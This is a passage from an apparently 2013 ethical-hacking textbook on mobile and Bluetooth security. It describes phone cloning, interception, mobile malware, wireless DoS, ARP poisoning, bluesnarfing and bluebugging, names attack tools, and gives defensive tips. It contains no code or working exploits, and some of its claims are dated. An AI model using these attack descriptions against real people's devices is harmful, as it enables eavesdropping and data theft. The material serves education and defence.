 Although the law provides penalties for the interception of cellular

telephone calls, it is easily accomplished and impossible to detect.

 Radio hobbyists have web sites where they exchange cell phone
numbers of "interesting" targets. Opportunistic hobbyists
sometimes sell their best "finds".

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 317

 Ethical Hacking Part I

 It is easy for an eavesdropper to determine a target's. Cell phone

number, because transmissions are going back and forth to the cell
site whenever the cell phone has battery power and is able to
receive a call.

 The scanner immediately picks up the initial transmission to the

cellular site to register the active system.

 The number can be entered automatically into a file of numbers for

continuous monitoring.

VULNERABILITY TO BEING USED AS A MICROPHONE

 A cell telephone can be turned into a microphone and transmitter

for the purpose of listening to conversations in the vicinity of the
phone.

 This is done by transmitting a maintenance command on the

control channel to the cell phone.

 This command places the cell telephone in the "diagnostic mode."

 When this is done, conversations in the immediate area of the

telephone can be monitored over the voice channel.

 The user doesn't know the telephone is in the diagnostic mode and
transmitting all nearby sounds until he or she tries to place a call.

 Then, before the cell telephone can be used to place calls, the unit
has to be cycled off and then back on again.

This threat is the reason why cell telephones are prohibited in areas
where classified or sensitive discussions are held!

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 318

 Ethical Hacking Part I

VULNERABILITY TO CLONING

 Cell phone thieves don't steal cell phones in the usual sense of
breaking into a car and taking the telephone hardware.

 Instead, they monitor the radio frequency spectrum and steal the
cell phone pair as it is being anonymously registered with a cell
site.

 Cloning is the process whereby a thief intercepts the electronic

serial number (ESN) and mobile identification number (MIN) and
programs those numbers into another telephone to make it
identical to yours.

 Once cloned, the thief can place calls on the reprogrammed

telephone as though he were the legitimate subscriber.

What makes this possible is the fact that each time your cell phone is
turned on or used; it transmits the pair to the local cellular site and
establishes a talk channel.

It also transmits the pair when it is relocated from one cell site to
another.

Cloning occurs most frequently in areas of high cell phone usage -- valet
parking lots, airports, shopping malls, concert halls, sports stadiums,
and high-congestion traffic areas in metropolitan cities.

No one is immune to cloning, but you can take steps to reduce the
likelihood of being the next victim.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 319

 Ethical Hacking Part I

22.4 CELL PHONE SECURITY MEASURES

If you are using cell phone, you can reduce the risk by following these
guidelines:

 Because a cell phone can be turned into a microphone without your

knowledge, do not carry a cell phone into any classified area or
other area where sensitive discussions are held.

 Turn your cell phone on only when you need to place a call.

 Turn it off after placing the call.

 Do not discuss sensitive information on a cell phone.

 When you call someone from your cell phone, consider advising
them that you are calling from a cell phone that is vulnerable to
monitoring, and that you will be speaking generally and not get into
sensitive matters.

 Do not leave your cell phone unattended.

 If your cell phone is vehicle-mounted, turn it off before permitting

valet parking attendants to park the car, even if the telephone
automatically locks when the car's ignition is turned off.

 Avoid using your cell phone within several miles of the airport,
stadium, mall, or other heavy traffic locations.

 These are areas where radio hobbyists use scanners for random
monitoring.

 If they come across an interesting conversation, your number may

be marked for regular selective monitoring.

 If your cell service company offers personal identification numbers

(PIN), consider using one.

 Although cell PIN services are cumbersome and require that you
input your PIN for every call, they are an effective means of
preventing cloning.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 320

 Ethical Hacking Part I

CELL PHONE SECURITY RISK

Most current cell phones have the ability to send and receive text
messages. Some cell phones and PDAs also offer the ability to connect to
the internet. Although these are features that you might find useful and
convenient, attackers may try to take advantage of them. As a result, an
attacker may be able to accomplish the following:
1. Abuse your service - Most cell phone plans limit the number of
text messages you can send and receive. If an attacker spams
you with text messages, you may be charged additional fees. An
attacker may also be able to infect your phone or PDA with
malicious code that will allow them to use your service. Because
the contract is in your name, you will be responsible for the
charges.

2. Lure you to a malicious web site - While PDAs and cell phones
that give you access to email are targets for standard phishing
attacks, attackers are now sending text messages to cell
phones. These messages, supposedly from a legitimate
company, may try to convince you to visit a malicious site by
claiming that there is a problem with your account or stating
that you have been subscribed to a service. Once you visit the
site, you may be lured into providing personal information or
downloading a malicious file.

3. Use your cell phone or PDA in an attack - Attackers who can

gain control of your service may use your cell phone or PDA to
attack others. Not only does this hide the real attacker's
identity, it allows the attacker to increase the number of targets.

4. Gain access to account information - In some areas, cell phones

is becoming capable of performing certain transactions (from
paying for parking or groceries to conducting larger financial
transactions). An attacker who can gain access to a phone that
is used for these types of transactions may be able to discover
your account information and use or sell it.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 321

 Ethical Hacking Part I

CELL PHONE SECURITY TIPS

1. Follow general guidelines for protecting portable devices - Take

precautions to secure your cell phone and PDA the same way you
should secure your computer.

2. Be careful about posting your cell phone number and email

address - Attackers often use software that browses web sites for
email addresses. These addresses then become targets for attacks
and spam. Cell phone numbers can be collected automatically, too.
By limiting the number of people who have access to your
information, you limit your risk of becoming a victim.

3. Do not follow links sent in email or text messages - Be suspicious

of URLs sent in unsolicited email or text messages. While the links
may appear to be legitimate, they may actually direct you to a
malicious web site.

4. Be wary of downloadable software - There are many sites that offer

games and other software you can download onto your cell phone
or PDA. This software could include malicious code. Avoid
downloading files from sites that you do not trust. If you are
getting the files from a supposedly secure site, look for a web site
certificate. If you do download a file from a web site, consider
saving it to your computer and manually scanning it for viruses
before opening it.

5. Evaluate your security settings - Make sure that you take

advantage of the security features offered on your device. Attackers
may take advantage of Bluetooth connections to access or
download information on your device. Disable Bluetooth when you
are not using it to avoid unauthorized access.

6. Guard your cell phone like you would your wallet.

7. Password-protect your device.

8. Don't be fooled by cell phone insurance.

9. Call your cell phone provider as soon as you discover the loss.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 322

 Ethical Hacking Part I

10. File a police report.

22.5 Mobile Related Threats

So far mobile security threats have been a relatively minor annoyance to

a handful of users in Europe and Asia. But even though the risk of
catching a virus on your cell phone is still relatively small, it is
continuously increasing as the use of email and Internet on cell phones
is growing. Also in North America, where conditions for these threats are
ripening as rapidly as in the rest of the world.

The threat is becoming real

Attacks on cell phones rose fivefold in 2006, with clients of 83 percent of

mobile operators around the world having been hit, and experts agree
that 2007 will likely be the year when mobile viruses become more than
a theoretical problem. Several reports and predictions by experts indicate
that criminals increasingly will target Smartphone and PDA devices as
data moves to these devices. The rapid evolution of mobile viruses means
they will pose a major threat in the future.

In the spring of 2007 a mobile antivirus firm demonstrated this trend.

The company took a standard Nokia 6330 mobile phone to British high
streets and shopping centre’s, and opened up the device to mobile phone
viruses simply by turning on its Bluetooth receiver or downloading files
via MMS, SMS or email. During a 28-day period the phone was infected 7
times by 5 types of viruses.

Serious damage

Since the first mobile virus appeared in 2004, the number of different
viruses, worms or other type of mobile malware has now reached about
400 and the number is set to double by the end of 2007 as virus writers
are creating new ways to attack cell phone software. Mobile hackers
already have a large number of attack vectors. A mobile device can
become infected via download, via sharing memory cards with other
devices, via MMS, SMS or email, and via Bluetooth.

The damage that mobile viruses can do is also very diverse. The most
dangerous viruses can render a phone useless or steal money from users
through pricey messages or calls to unwanted numbers without the
user's knowledge. Other mobile malware is able to steal all data from a

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 323

 Ethical Hacking Part I

phone, listen in on calls, monitor MMS and SMS messages, and follow a
phone owner's tracks.

The mobile communication network is exposed to many security threats,

just like any other data network. The security threats are very real and
could be very harmful. We listed some of the unique mobile related
security problems below:

 Capturing a subscriber’s data session

 Spoofed SGSN or GGSN
 Spoofed Create PDP Context Request
 Spoofed Update PDP Context Request
 Overbilling Attacks
 Border Gateway bandwidth saturation
 DNS Flood
 GTP Flood
 Spoofed GTP PDP Context Delete
 DNS Cache Poisoning
 Gi bandwidth saturation
 Application Layer attacks from Handsets

Key mobile security concerns

1. Exposure of critical information: Small amounts of WLAN

signals can travel significant distance, and it's possible to peep
into these signals using a wireless sniffer. A wireless intruder
could expose critical information if sufficient security isn't
implemented.

2. Lost or stolen devices: Even if sufficient security is implemented

in wireless virtual private networks (VPNs), if a device is lost or
stolen, the entire corporate intranet could be threatened if those
devices aren't protected by password and other user-level security
measures.

3. Mobile viruses: Mobile viruses can be a major threat, particularly

with devices that have significant computational capabilities.
Mobile devices, in general, are susceptible to viruses in several
ways: Viruses can take advantage of security holes in
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 324
 Ethical Hacking Part I

applications or in the underlying operating system and cause

damage; applications or applets downloaded to a mobile device
can be as virus-prone as desktop applications; and, in some
mobile OSs, malformed SMS messages can crash the device. The
911 virus caused 13 million i-mode users to automatically place a
call to Japan’s emergency phone number.

4. E-mail viruses: E-mail viruses affect PDAs in much the same

way regular e-mail viruses affect PCs (i.e., causing the PDA e-mail
program to send multiple e-mails). These viruses are costly to
enterprises and interrupt normal business too.
PalmOS/LibertyCrack is an example of a PDA e-mail virus. It's a
known Trojan horse that can delete all applications on a Palm
PDA.

5. Spam: Spam causes disruption and drives up costs when it's

targeted toward wireless devices.

22.6 Mobile Malwares

22.6.1 Mobile Viruses

A mobile phone virus is a computer virus specifically

adapted for the cellular environment and designed to
spread from one vulnerable phone to another.
Although mobile phone virus hoaxes have been
around for years, the so-called Cabir virus is the first
verified example. The virus was created by a group
from the Czech Republic and Slovakia called 29a,
who sent it to a number of security software
companies, including Symantec in the United States
and Kapersky Lab in Russia. Cabir is considered a
"proof of concept" virus, because it proves that a
virus can be written for mobile phones, something that was once
doubted.

Cabir was developed for mobile phones running the Symbian and Series
60 software, and using Bluetooth. The virus searches within Bluetooth's
range (about 30 meters) for mobile phones running in discoverable mode

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 325

 Ethical Hacking Part I

and sends itself, disguised as a security file, to any vulnerable devices.

The virus only becomes active if the recipient accepts the file and then
installs it. Once installed, the virus displays the word "Caribe" on the
device's display. Each time an infected phone is turned on; the virus
launches itself and scans the area for other devices to send it to. The
scanning process is likely to drain the phone's batteries. Cabir can be
thought of as a hybrid virus/worm: its mode of distribution qualifies it as
a network worm, but it requires user interaction like a traditional virus.

Cabir is not considered very dangerous, because it doesn't cause actual

damage, and because users can prevent infection by simply refusing to
accept suspicious files. However, the virus's code could be altered to
create more harmful malware that might, for example, delete any
information stored on phones it infects, or send out fake messages
purporting to be from the phone's owner.

Common mobile viruses

Cabir: Infects mobile phones running on Symbian OS. When a phone is

infected, the message 'Caribe' is displayed on the phone's display and is
displayed every time the phone is turned on. The worm then attempts to
spread to other phones in the area using wireless Bluetooth signals.
Duts: A parasitic file infector virus and is the first known virus for the
PocketPC platform. It attempts to infect all EXE files in the current
directory (infects files that are bigger than 4096 bytes)
Skulls: A Trojan horse piece of code. Once downloaded, the virus, called
Skulls, replaces all phone desktop icons with images of a skull. It also
will render all phone applications, including SMSes and MMSes useless
Commwarrior: First worm to use MMS messages in order to spread to
other devices. Can spread through Bluetooth as well. It infects devices
running under OS Symbian Series 60. The executable worm file once
launched hunts for accessible Bluetooth devices and sends the infected
files under a random name to various devices.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 326

 Ethical Hacking Part I

22.6.2 Mobile Worms

A worm is a self-replicating virus that does

not alter files but resides in active memory
and duplicates itself. Worms use parts of an
operating system that are automatic and
usually invisible to the user. It is common for
worms to be noticed only when their
uncontrolled replication consumes system
resources, slowing or halting other tasks.

Examples

 Mabir Worm
Mabir worm spreads through Multimedia Messaging Service messages
(MMS) and it doesn't just send itself to numbers in a user’s phone book,
it also replies to any received messages. Mabir is essentially a
variant of the Cabir worm, which spreads only using Bluetooth.

 Lasco.A
Lasco.A used bluetooth and infected .SIS files; in this respect it differed
from the Cabir.H worm. When a user clicks the velasco.sis file and
chooses to install it, the worm activates and starts looking for new
devices to infect over bluetooth. Files infected by Lasco.A would not be
automatically sent to other devices. Lasco.A worm could only be sent to
mobile phones that support bluetooth and were in discoverable mode.

 Commwarrior.Q
Commwarrior.Q will jump onto another phone using a short-range
Bluetooth wireless connection. It also spreads via MMS (multimedia
messaging service) or by an infected memory card inserted into a device.
Commwarrior.Q will continuously send MMS messages from midnight to
7 a.m. to people in an infected phone's address book. It cleverly
assembles a text message from the phone's "sent" file, making it appear
legitimate. After 7 a.m., however, Commwarrior.Q stops that action, as it
would be noticeable to the user. It then starts scanning other phones to
infect via Bluetooth. Commwarrior.Q will infect any Symbian OS
application installation files, called SIS files. Unlike its predecessors, the
SIS files that Commwarrior.Q infects take on random names, making
them harder to identify. Previous versions of Commwarrior used the
same file name. The SIS files also range in size from 32,100 to 32,200

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 327

 Ethical Hacking Part I

bytes, making them hard to distinguish from MMS messages if mobile

operators wanted to filter them out of their networks. Commwarrior.Q
can't automatically infect a phone, however, a user will be prompted if
they receive an infected SIS file, and they have to accept the file. Users
also get another security prompt. After that, however, Commwarrior.Q
will start running. Commwarrior.Q does not damage data on a phone,
but a user could incur high phone charges caused by the worm sending
messages during the night.

 Cabir.A
Cabir is a bluetooth using worm. Cabir replicates over bluetooth
connections and arrives to phone messaging inbox as caribe.sis file what
contains the worm. When user clicks the caribe.sis and chooses to install
the Caribe.sis file the worm activates and starts looking for new devices
to infect over bluetooth. When Cabir worm finds another bluetooth device
it will start sending infected SIS files to it, and lock to that phone so that
it won't look other phones even when the target moves out of range.
Please note that Cabir worm can reach only mobile phones that support
bluetooth, and are in discoverable mode. Setting you phone into non-
discoverable (hidden) Bluetooth mode will protect your phone from Cabir
worm. But once the phone is infected it will try to infect other systems
even as user tries to disable bluetooth from system settings.

22.6.3 Trojan Horse

A Trojan horse, or trojan for short, is a term used to describe malware

that appears, to the user, to perform a desirable function but, in fact,
facilitates unauthorized access to the user's computer system. The term
comes from the Trojan Horse story in Greek mythology. Trojan horses are
not self-replicating which distinguishes them from viruses and worms.
Additionally, they require interaction with a hacker to fulfill their
purpose. The hacker need not be the individual responsible for
distributing the Trojan horse. It is possible for hackers to scan
computers on a network using a port scanner in the hope of finding one
with a Trojan horse installed.

The term comes from the Greek story of the Trojan War, in which the
Greeks give a giant wooden horse to their foes, the Trojans, ostensibly as
a peace offering. But after the Trojans drag the horse inside their city

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 328

 Ethical Hacking Part I

walls, Greek soldiers sneak out of the horse's hollow belly and open the
city gates, allowing their compatriots to pour in and capture Troy.
Operations which could be performed by a hacker on a target computer
system include:

1. Use of the machine as part of a Botnet (e.g. to perform Distributed

Denial-of-service (DDoS) attacks)
2. Data Theft (e.g. passwords, security codes, credit card information)
3. Installation of software (including other malware)
4. Downloading of files
5. Uploading of files
6. Deletion of files
7. Modification of files
8. Keystroke logging
9. Viewing the user's screen
10. Wasting computer space

Example of Trojan horse

An example of a Trojan horse attack is one that was reported in 1999:
This Trojan horse was distributed using email. Reports suggest that it
was widely distributed and that there were several versions. The email
sent to distribute the Trojan horse purported to be from Microsoft
Corporation and to offer a free upgrade for Microsoft Internet Explorer.
The email did not originate from Microsoft Corporation nor did it provide
an upgrade for Microsoft Internet Explorer. The Trojan horse was an
executable file named "ie0199.exe" and was provided as an email
attachment. One version of the email included the message:
As a user of the Microsoft Internet Explorer, Microsoft Corporation
provides you with this upgrade for your web browser. It will fix some
bugs found in your Internet Explorer. To install the upgrade, please save
the attached file (ie0199.exe) in some folder and run it. Once installed
the Trojan horse reportedly modified system files and attempted to
initiate contact with other remote systems.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 329

 Ethical Hacking Part I

22.6.4 Mobile Spywares

Spyware is a type of malware that is installed on computers and that
collects information about users without their knowledge. The presence
of spyware is typically hidden from the user. Typically, spyware is
secretly installed on the user's personal computer. Sometimes, however,
spywares such as keyloggers are installed by the owner of a shared,
corporate, or public computer on purpose in order to secretly monitor
other users.
Mobile Viruses are becoming more common; so are many other security
threats to mobile devices and the data they hold.

Most recently, however, researchers have learned that hackers are now
creating mobile spyware, which manipulates SMS messages and allows
them to be read by others.
The spyware works like this:
A hacker sends an SMS message to the target. The target opens the
message, installing the spyware onto the device. That spyware,
unbeknownst to the victim, takes the SMS messages and forwards them
on to the hacker.
Mobile operators should be the most concerned because protecting
devices would cost them money, and a massive spyware outbreak could
also have a financial impact. In March, malware was found that copied
SMS messages and sent them to a server where they could be retrieved
by hackers. Then, in September, spyware was found that could retrieve
SMS messages, contact numbers and call logs. There is also mobile
malware that can call a device, make the device answer silently without
the user's knowledge, and turn the device into a remote bug.

22.6.5 Futuristic Threats

Mobile malware as present today does not present a significant risk to

the average mobile user. This is mainly because of the lack of potent
mobile malware in the wild. We could determine the following factors
resulting in mobile malware being less harmful.

1. Mobile devices did not store any critical information. Thus leaking
it or erasing was not lucrative to the mobile malware developers.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 330

 Ethical Hacking Part I

2. Most of the mobile devices in use today do not support

programmable capabilities or for that matter processors capable of
running applications. As a result, even with the penetration of
mobile devices being high, those that can support these mobile
malware are not very large.

Depending upon our study of the current technologies prevalent in the

mobile domain, the vulnerabilities present in them and the different
possibilities of attack, we could briefly categorize the futuristic threats in
the following categories.

22.7 Mobile Based Attacks

There are three main types of attacks against wireless networks: denial of
service attacks, man in the middle attacks, and ARP poisoning attacks.
WEP key-cracking, which is often also considered an attack, will be
introduced in this article and then discussed in detail in the next
installment.

22.7.1 Denial of Service (DoS) attacks

The objective of any denial of service attack is to prevent users from

accessing network resources -- to deny them service. The usual methods
of triggering DoS attacks are to flood a network with degenerate or faulty
packets, crowding out legitimate traffic and causing systems not to
respond.

Wireless systems are particularly susceptible to DoS attacks because of

the way different layers of the OSI stack interact with one another. First,
and perhaps most obviously, an attack using the "physical" layer in a
wireless network is much easier than to attack the physical layer of a
wired network -- the physical layer is the air, the general vicinity around
a particular access point. Attackers don't need to gain access to your
internal corporate campus; they can simply drive by and begin their
attack from a car or even a nearby shop or restaurant, depending on how
your access points are laid out. It's also more difficult to discern whether
or not a physical DoS attack has occurred with a wireless network as
typically, there is no real evidence. An attacker can create a physical DoS
attack by manufacturing a device that will flood the 2.4 GHz spectrum
with noise and illegitimate traffic, a task that is not technically
complicated. Even some poorer quality cordless phones can cause

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 331

 Ethical Hacking Part I

interference at 2.4 GHz, the range that 802.11b wireless networks

operate.

At the data link layer of the OSI stack, again one can point out numerous
ways in which DoS attacks are simpler to launch against wireless
systems than against traditional wired networks. One of the most
common ways to mount an attack against the data link layer is through
the manipulation of diversity antennas. Here's how that might work: say
there is an access point, named AP, with diversity antennas A (for the left
side) and B (for the right). If user 1 and user 2 are on opposite sides of
the office, then each user by default accesses a different antenna on the
access point. Herein lies the problem-if user A decided to clone the MAC
address of user B, the former can take the latter off the network. By
increasing the strength of his signal to at least equal, if not exceeding,
user B's signal on antenna A, then the access point will no longer send or
receive data from user A. He has been denied service, and the attack was
successful.

Spoofed access points are another problem with the data link layer on
wireless networks, even with WEP authentication. Clients are typically
configured to associate with the access point with the strongest signal.
An attacker can simply spoof the SSID (the name) of an access point and
clients will automatically associate with it and pass frames back and.
Here is where an attacker can capture traffic and, with time, determine
the WEP key used to authenticate and encrypt traffic on the wireless
network.

Finally, at the network layer, it's simple to flood a wireless network with
large ping requests or other unauthentic traffic once an attacker has
associated with a particular wireless access point.

22.7.2 Man-in-the-middle attacks

Similar to DoS attacks, man-in-the-middle attacks on a wireless network

are significantly easier to mount than against physical networks,
typically because such attacks on a wired network require some sort of
access to the network. Man-in-the-middle attacks take two common
forms: eavesdropping and manipulation.

In eavesdropping, an attacker simply listens to a set of transmissions to

and from different hosts even though the attacker's computer isn't party

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 332

 Ethical Hacking Part I

to the transaction. Many relate this type of attack to a leak, in which

sensitive information could be disclosed to a third party without the
legitimate users' knowledge. Manipulation attacks build on the capability
of eavesdropping by taking this unauthorized receipt of a data stream
and changing its contents to suit a certain purpose of the attacker-
perhaps spoofing an IP address, changing a MAC address to emulate
another host, or some other type of modification.

To prevent an eavesdropping attack, one must encrypt the contents of a

data transmission at several levels, preferably using SSH, SSL, or IPsec.
Otherwise, large amounts of traffic containing private information are
passed through thin air, just waiting for an attacker to listen in and
collect the frames for further illegitimate analysis.

22.7.3 ARP poisoning

To understand an ARP poisoning attack, a bit of background on ARP

itself is needed. The Address Resolution Protocol allows Ethernet objects
using TCP/IP as their communications protocol to discern which other
objects on a network have which IP addresses. Much like NetBIOS, it is a
chatty protocol that broadcasts traffic to all hosts when a particular
packet is only meant for one host on that network, ARP broadcasts a
request to identify a particular host that is using a certain IP address.
The host in question receives that message and acknowledges it, and the
originating computer stores the responding computer's MAC address in
its cache, knowing that further transmission to that host won't require
any further IP address discovery.

The problem comes about with modern operating systems that don't fully
adhere to the spirit of ARP broadcasting and detection. If a computer
running modern versions of Windows or even Linux detects a packet sent
from a particular machine on the network, it will assume that the MAC
address of that computer correctly corresponds with the IP address from
which the sending computer is purportedly transmitting. All future
transmissions to that computer will then take place using that efficiently
but problematically learned IP address, which is stored in the computer's
cache for future reference.

But what if an attacker creates illegitimate packets with a spoofed IP

address that claims that IP belongs to his own computer's MAC address?
Then, all transmissions from hosts that use the "shortcut" method of

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 333

 Ethical Hacking Part I

learning MAC/IP address combinations will be directed to the attacker's

computer and not to the intended host, which allows the attacker's
computer to eavesdrop on communications and possibly manipulate
responses to deepen his attack.

This is certainly a serious problem. An attacker can get packets and

frames out of thin air by simply "poisoning" these local caches of MAC/IP
combinations of any two hosts connected to the physical network on
which any access point runs.

22.6.4. Bluetooth and Bluetooth based attacks

Bluetooth is an open wireless

protocol for exchanging data over
short distances from fixed and
mobile devices, creating personal
area networks (PANs). Bluetooth is a
high-speed, low-power microwave
wireless link technology, designed to
connect phones, laptops, PDAs and
other portable equipment together
with little or no work by the user. It
was originally conceived as a
wireless alternative to RS232 data
cables. It can connect several
devices, overcoming problems of
synchronization.
Bluetooth is the name for a short-
range radio frequency (RF) technology that operates at 2.4 GHz and is
capable of transmitting voice and data. The effective range of Bluetooth
devices is 32 feet (10 meters). Bluetooth transfers data at the rate of 1
Mbps, which is from three to eight times the average speed of parallel
and serial ports, respectively. It is also known as the IEEE 802.15
standards. It was invented to get rid of wires. Bluetooth is more suited
for connecting two point-to-point devices, whereas Wi-Fi is an IEEE
standard intended for networking.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 334

 Ethical Hacking Part I

i. List of applications

A typical Bluetooth mobile phone headset.

More prevalent applications of Bluetooth include:

 Wireless control of and communication between a mobile phone

and a hands-free headset. This was one of the earliest applications
to become popular.
 Wireless networking between PCs in a confined space and where
little bandwidth is required.
 Wireless communication with PC input and
output devices, the most common being the
mouse, keyboard and printer.
 Transfer of files, contact details, calendar
appointments, and reminders between
devices with OBEX.
 Replacement of traditional wired serial
communications in test equipment, GPS
receivers, medical equipment, bar code
scanners, and traffic control devices.
 For controls where infrared was traditionally used.
 For low bandwidth applications where higher [USB] bandwidth is
not required and cable-free connection desired.
 Sending small advertisements from Bluetooth-enabled advertising
hoardings to other, discoverable, Bluetooth devices.
 Wireless bridge between two Industrial Ethernet (e.g., PROFINET)
networks.
 Two seventh-generation game consoles, Nintendo's Wii and Sony's
PlayStation 3, use Bluetooth for their respective wireless
controllers.
 Dial-up internet access on personal computers or PDAs using a
data-capable mobile phone as a modem.

ii. Bluetooth Hacking

Bluetooth provides an easy way of communication for a wide range of
mobile devices to communicate with each other without the need for
cables or wires and transfer files in between them. Bluetooth hacking
has gained popularity recently with an increasing amount of software
becoming available to hackers for gaining access to Bluetooth devices.
Most of the hacking tools seem to be for the Linux platform and include
names such as BlueScan, BlueSniff and BTBrowser.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 335

 Ethical Hacking Part I

iii. Various Bluetooth based attacks

How would a potential hacker exploit the Bluetooth radio in your

handheld device? Bluetooth attacks often have cute names that belie
their true intentions. Here are some of the most popular Bluetooth
hacks.

Bluesnarfing . Bluesnarfing attacks involve a hacker covertly gaining

access to your Bluetooth-enabled device for the purpose of retrieving
information, including addresses, calendar information or even the
device's International Mobile Equipment Identity. With the IMEI, a
hacker could route your incoming calls to his cell phone.

Bluesnarfing was a bigger problem on cell phones between 2003 and

2004. It is hard to do, and the necessary software can be tough to obtain.
Firmware updates have reduced the threat considerably. In addition,
placing your phone in a non-discoverable mode makes it harder on the
attacker, because he then needs additional software to locate your
Bluetooth signal.

Bluebugging. Bluebugging means hacking into a Bluetooth device and

using the commands of that device without notifying or alerting the user.
By bluebugging, a hacker could eavesdrop on phone conversations, place
phone calls, send and receive text messages, and even connect to the
Internet.
Bluebugging exploits a different vulnerability than bluesnarfing. It's a

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 336

 Ethical Hacking Part I

firmware issue commonly associated with older cell phones. In the lab we
were more successful with bluesnarfing than bluebugging.

Bluejacking. Bluetooth devices have the ability to send so-called wireless

business cards. A recent trend has been to send anonymous business
cards with offensive messages, and frankly, it's easy to do. But it doesn't
put data in jeopardy.

Bluejacking requires an attacker to be within 10 meters of a device. If

someone bluejacks you, you could probably see his face. Never add
bluejack messages to your contacts list. And to avoid the nuisance
altogether, simply put your phone on non-discoverable mode.

Denial of service

DOS attacks occur when an attacker uses his Bluetooth device to

repeatedly request pairing with the victim's device. Unlike on the
Internet, where this type of constant request can bring down services, a
Bluetooth DOS attack is mostly just a nuisance, since no information
can be transferred, copied or attained by the attacker.

DOS attacks are the easiest to perform and can drain a device's battery
or temporarily paralyze the phone or PDA. However, since this attack
relies on the proximity of the attacker to the victim, it's easy to stop. Just
walk away.

In the Lab, we were able to perform DOS attacks on every Bluetooth

device we tested. Currently, there are few software defenses against this
type of assault.

iv. Various Software for Bluetooth Hacking

 BlueScanner
 BTBrowser
 BTCrawler
 BlueJacking
 BlueSnarfing
 MagicBlueHack
 BluetothHack

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 337

 Ethical Hacking Part I

BlueScanner – It search out for Bluetooth devices and extract much

amount of information of the newly discovered device.
BlueSniff – It is a simple utility for discovering hidden Bluetooth devices.
BlueBugger - It simply exploits the BlueBug vulnerability of the
Bluetooth enabled devices. By exploiting these vulnerabilities and leaks,
you can gain access to the phone-book, calls lists and other information
of the Bluetooth device. Bluebugging involves hacking into a phone using
device commands without the user noticing. If the hacker were
successful, they could listen in on phone conversations, make phone
calls and send or receive text messages. Bluebugging has a similar result
to bluesnarfing but exploits a different vulnerability that is found in older
phones.
BTBrowser – Is a Bluetooth Browser is a J2ME app. which can browse
and explore all the surrounding Bluetooth devices. Browse to different
kind of device information.
BTCrawler -It is a Bluetooth scanner for Windows Mobile based devices.
It can implement BlueJacking and BlueSnarfing attacks.
Bluesnarfing - Bluesnarfing involves gaining unauthorized access to a
Bluetooth enabled device for the purpose of accessing or stealing
personal information or files. This form of Bluetooth hacking is probably
the most difficult for the hacker to achieve and recent firmware upgrades
to Bluetooth devices have reduced the risk. Your best form of protection
is to not leave your phone is discoverable mode.
Bluejacking - Bluejacking is a mostly harmless activity and usually
involves sending a vCard (electronic business card) to another Bluetooth
device with an offensive message in the name field. As most Bluetooth
devices are still in the 10 meter range, the person who "Bluejacked" you
is likely to be in the same room.

If you are concerned, your best form of protection is to keep your devices
Bluetooth turned off when not in use. And when Bluetooth is turned on,
make sure you don't leave it in discoverable mode.

v. BlueTooth Hacking example For Fun and Profit

WiFi wardriving tools have now advanced to the point where it is less a
sign of techno-machismo and more a sign of social mal adjustment to
actually go out and wardrive in your neighborhood. Software Defined
Radio is a good suggestion, but you're limited to the frequencies you can
use without relatively expensive equipment. Another recommendation
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 338
 Ethical Hacking Part I

might be investigating the security characteristics of your Bluetooth

enabled device.
Bluejacking became a relatively popular sport last year. According to the
Bluejackq with a Q site, Bluejacking is the sending unsuspecting
Bluetooth device owner’s unsolicited message for fun.

Bluejacking works because many people leave their phone in the "visible"
state. This means it's viewable by other Bluetooth devices within range.
The bluejacker takes advantage of the fact that Bluetooth device names
can be as long as 254 characters. By temporarily changing the
bluejacking device's name to include a saucy message like "Mama, konna
toi tokoro made, yuko oide kudasaimashita *." When sent, the target
phone displays a message like '"Mama, konna toi tokoro made, yuko oide
kudasaimashita." just sent you a message.' The social goal of Bluejacking
appears to be to use a message interesting enough so that the receiver
does not pay attention to the "just sent you a message." part of the alert,
but not so interesting that the sender would be arrested for violating
local obscenity regulations.

Bluejacking is a mostly harmless activity. Though it is an unintended

use of a technical feature, most hard-core geeks do not find sufficient
technical challenge in the activity. For the more serious hacker, looking
to explore the security features of their Handset, more technically
demanding sport is required.

To get an idea for the types of security vulnerabilities with which

Bluetooth device owners must contend, there are a number of good
resources a few mouse clicks away. After a little investigation, the next
step is to install and/or configure a Bluetooth networking stack on their
device of choice. The ever-popular Linux operating system is a good
choice for persons wishing to experiment with a broad range of Bluetooth
features. Bluez is a Bluetooth networking stack that runs on Linux.

BlueSniff and RedFang are two popular applications that eavesdrop on

Bluetooth conversations. BTScanner is a tool that will query your device
and report common settings; very useful when trying to figure out if a
device is susceptible to attack.

* "Mama, konna toi tokoro made, yuko oide kudasaimashita," is

Japanese for "My Goodness! What a pleasure to see you in this neck of
the woods."

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 339

 Ethical Hacking Part I

CHAPTER 23
Social Engineering
Objective
23.1 Introduction
23.3 Social Engineering methods for hacking
23.3 Common Types of Attacks
23.4 Social-Engineering Countermeasures

23.1 Introduction

Social engineering is a term that describes a non-technical kind of

intrusion that relies heavily on human interaction and often involves
tricking other people to break normal security procedures.

A social engineer runs what used to be called a "con game." For example,
a person using social engineering to break into a computer network
might try to gain the confidence of an authorized user and get them to
reveal information that compromises the network's security. Social
engineers often rely on the natural helpfulness of people as well as on
their weaknesses.

Social engineering is a component of many, if not most, types of exploits.

Virus writers use social engineering tactics to persuade people to
run malware-wrapped email attachments, phishers use social
engineering to convince people to divulge sensitive information, and scare
ware vendors use social engineering to frighten people into running
software that is useless at best and dangerous at worst.

Another aspect of social engineering relies on people's inability to keep

up with a culture that relies heavily on information technology. Social
